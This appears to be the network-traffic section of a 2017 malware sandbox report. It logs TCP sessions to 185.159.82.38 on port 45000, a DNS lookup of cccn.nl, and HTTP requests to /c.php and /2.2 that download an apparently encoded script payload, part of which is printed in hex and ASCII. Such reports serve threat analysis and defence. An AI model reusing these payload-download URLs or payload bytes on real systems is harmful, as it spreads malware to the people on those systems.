Mai 28, 2017 17:19:51.009648085 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.009687901 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.014925003 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.015399933 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.015435934 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.089848995 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.089878082 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.090152025 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.090198994 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.091567039 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.091597080 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.091826916 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.091875076 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.092251062 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.092269897 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.092680931 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.092720985 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.097778082 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.098032951 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.098078966 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.106874943 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.106904030 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.107132912 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.107178926 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.111257076 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.111507893 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.111552954 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.133716106 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.134040117 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.134077072 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.145489931 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.145834923 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.145862103 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.152195930 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.152225018 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.152559996 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.152586937 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.159396887 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.159532070 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.159568071 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.160038948 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.160069942 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.160193920 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.160223961 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.173832893 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.173855066 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.173995972 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.174022913 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.207982063 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.208009958 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.208019972 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.208219051 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.208261967 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.210056067 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.210297108 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.210340023 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.212852001 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.212882042 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.212893963 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.213140965 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.213186979 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.215878010 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.215909004 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.216130018 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.216173887 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.218471050 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.218678951 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.218720913 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.218905926 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.218935966 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.219194889 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.219232082 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.219619036 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.219829082 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.219867945 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.220601082 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.220628977 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.220772028 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.220810890 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.226483107 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.226512909 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.226731062 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.226775885 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.246036053 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.246067047 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.246074915 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.246263027 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.246306896 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.264993906 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.265206099 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.265249014 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.292817116 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.292848110 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.292982101 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.293010950 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.313031912 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.313397884 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.313420057 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.333051920 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.333071947 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.333148003 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.333173037 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.335000038 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.335309029 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.335328102 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.387063980 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.387082100 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.387212992 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.387233019 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.393774986 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.393791914 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.394119978 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.394144058 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.414021969 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.414038897 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.414043903 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.414231062 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.414257050 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.429514885 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.429894924 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.429917097 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.442948103 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.442981005 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.443167925 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.443192959 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.482846975 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.482990026 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.483016968 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.497926950 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.497945070 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.498284101 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.498313904 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.507572889 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.508116961 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.508147001 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.520925999 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.520946026 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.521364927 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.521389008 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.553018093 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.553212881 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.553255081 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.568125963 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.568156958 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.568362951 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.568406105 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.581593037 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.581788063 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.581830978 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.599704981 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.599734068 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.599956989 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.599999905 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.624140978 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.624386072 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.624428988 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.637482882 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.637514114 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.637747049 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.637810946 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.652961969 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.653209925 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.653254032 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.701993942 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.702025890 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.702136993 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.702164888 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.715821981 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.715853930 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.716100931 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.716144085 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.746495008 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.746526957 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.746819973 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.746857882 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.748189926 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.748347044 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.748385906 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.760118008 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.760148048 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.760339975 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.760382891 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.795573950 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.795819998 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.795862913 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.804805040 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.804825068 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.805053949 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.805099010 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.857969999 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.858180046 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.858222961 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.871356010 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.871387005 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.871602058 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.871644974 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.885524035 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.885693073 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.885729074 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.899111986 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.899142027 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.899363995 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.899408102 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.912291050 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.912589073 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.912631989 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.940246105 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.940279007 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.940536022 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.940578938 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.990044117 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.990298986 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.990340948 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.997037888 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.997067928 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.997272968 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:51.997317076 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.003530979 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.003792048 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.003834009 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.037345886 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.037378073 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.037606001 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.037652016 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.057187080 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.057218075 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.057365894 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.057398081 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.083897114 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.083925962 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.084079981 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.084108114 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.097306013 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.097477913 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.097503901 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.144052029 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.144078970 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.144179106 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.144207001 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.149408102 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.149542093 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.149565935 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.163343906 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.163371086 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.163474083 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.163497925 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.202692986 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.203116894 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.203150988 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.203948975 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.203977108 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.204400063 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.204442024 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.223489046 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.223933935 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.223959923 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.233644009 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.233659983 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.233953953 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.233973980 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.273379087 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.273582935 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.273614883 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.286787033 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.286802053 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.287096024 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.287118912 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.311897993 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.312302113 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.312330961 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.342700005 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.342727900 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.342926979 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.342966080 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.373136997 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.373323917 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.373362064 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.387934923 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.387964964 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.388156891 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.388197899 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.404840946 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.405131102 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.405174017 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.437968016 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.437998056 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.438222885 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.438266039 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.461354971 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.461564064 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.461606026 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.474941015 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.474960089 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.475235939 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.475280046 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.670805931 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:52.670850992 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:52.874363899 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:56.116442919 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:56.116570950 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:56.195676088 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:56.195708036 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:56.195823908 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:56.195841074 MESZ4500049235185.159.82.38192.168.1.16

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Mai 28, 2017 17:18:54.833045006 MESZ5240153192.168.1.168.8.8.8
Mai 28, 2017 17:18:55.158092022 MESZ53524018.8.8.8192.168.1.16

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Mai 28, 2017 17:18:54.833045006 MESZ192.168.1.168.8.8.80xb2c8Standard query (0)cccn.nlA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Mai 28, 2017 17:18:55.158092022 MESZ8.8.8.8192.168.1.160xb2c8No error (0)cccn.nl46.21.169.110A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • cccn.nl

HTTP Packets

TimestampSource PortDest PortSource IPDest IPHeaderTotal Bytes Transfered (KB)
Mai 28, 2017 17:18:55.243801117 MESZ4923480192.168.1.1646.21.169.110GET /c.php HTTP/1.1
Host: cccn.nl
Connection: Keep-Alive
0
Mai 28, 2017 17:18:55.446979046 MESZ804923446.21.169.110192.168.1.16HTTP/1.1 302 Found
Date: Sun, 28 May 2017 15:18:49 GMT
Server: Apache/2
Location: http://cccn.nl/2.2
Vary: User-Agent
Content-Length: 0
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
0
Mai 28, 2017 17:18:55.450790882 MESZ4923480192.168.1.1646.21.169.110GET /2.2 HTTP/1.1
Host: cccn.nl
0
Mai 28, 2017 17:18:55.592204094 MESZ804923446.21.169.110192.168.1.16HTTP/1.1 200 OK
Date: Sun, 28 May 2017 15:18:49 GMT
Server: Apache/2
Last-Modified: Sat, 27 May 2017 10:44:42 GMT
ETag: "51da7-5507f2433da80"
Accept-Ranges: bytes
Content-Length: 335271
Vary: Accept-Encoding,User-Agent
Data Raw: 23 40 7e 5e 6a 68 30 46 41 41 3d 3d 64 6d 33 72 52 48 6d 44 2f 32 2c 7b 3b 78 39 2b 57 6b 09 2b 5b 49 6b 6c 33 62 30 30 4b 44 3a 7f 2e 5c 6c 30 6b 09 6f 31 46 78 3b 09 4e 6e 30 62 55 2b 39 69 64 43 30 6b 25 33 32 34 2b 64 45 6b 71 5a 27 3b 09 4e 7f 30 6b 09 2b 39 49 2f 6d 33 72 25 53 74 72 5e 34 47 46 7b 3b 78 39 2b 30 62 55 6e 4e 70 2f 6d 33 72 25 2e 6e 37 6b 6e 68 3a 34 2b 6c 2a 78 3b 09 4e 2b 57 72 09 2b 5b 69 6b 43 30 6b 30 28 44 4b 6b 56 6b 26 57 78 45 09 4e 6e 30 62 78 6e 5b 70 2f 6c 30 72 25 31 57 78 44 55 4f 2f 3a 74 6d 78 71 27 3b 55 39 2b 57 6b 09 6e 4e 70 2f 43 56 62 25 6f 72 73 39 2b 5b 2c 52 78 21 78 5b 7f 30 62 78 2b 39 69 6b 43 33 62 25 6e 6c 4d 59 34 7f 32 27 45 09 5b 2b 36 6b 78 7f 5b 49 2f 6d 33 62 25 6e 6c 2e 4f 34 76 66 27 21 55 4e 7f 30 72 55 7f 4e 69 64 43 30 6b 30 59 34 6e
Data Ascii: #@~^jh0FAA==dm3rRHmD/2,{;x9+Wk+[Ikl3b00KD:.\l0ko1Fx;Nn0bU+9idC0k%324+dEkqZ';N0k+9I/m3r%Str^4GF{;x9+0bUnNp/m3r%.n7knh:4+l*x;N+Wr+[ikC0k0(DKkVk&WxENn0bxn[p/l0r%1WxDUO/:tmxq';U9+WknNp/CVb%ors9+[,Rx!x[0bx+9ikC3b%nlMY42'E[+6kx[I/m3b%nl.O4vf'!UN0rUNidC0k0Y4n
1
